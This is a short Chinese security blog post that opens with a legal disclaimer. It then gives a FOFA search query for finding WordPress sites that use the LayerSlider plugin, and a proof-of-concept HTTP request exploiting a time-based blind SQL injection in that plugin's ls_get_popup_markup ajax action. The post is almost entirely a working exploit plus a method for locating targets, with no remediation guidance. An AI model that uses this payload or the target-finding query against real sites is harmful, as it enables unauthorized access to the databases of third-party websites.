本文提醒读者,Aniya网络安全实验室的文章仅供研究,使用者需自行承担传播或利用信息可能带来的后果。文章提及了FOFA测绘技术及一个POC示例,展示了如何进行潜在的攻击尝试。
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!
0x01:FOFA测绘
body="/wp-content/plugins/LayerSlider/"
0x02:POC
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(7)))nEiK)--+vqlq HTTP/1.1
Host: 【ip】
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
